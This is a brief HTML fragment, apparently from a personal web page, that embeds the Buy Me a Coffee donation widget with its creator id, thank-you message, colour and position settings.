</script> <script data-name="BMC-Widget" data-cfasync="false" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="diegoosorib" data-description="Support me on Buy me a coffee!" data-message="Thank you for visiting. Feel free to invite me a coffee if you like my content ❤" data-color="#BD5FFF" data-position="Right" data-x_margin="18" data-y_margin="18"></script>
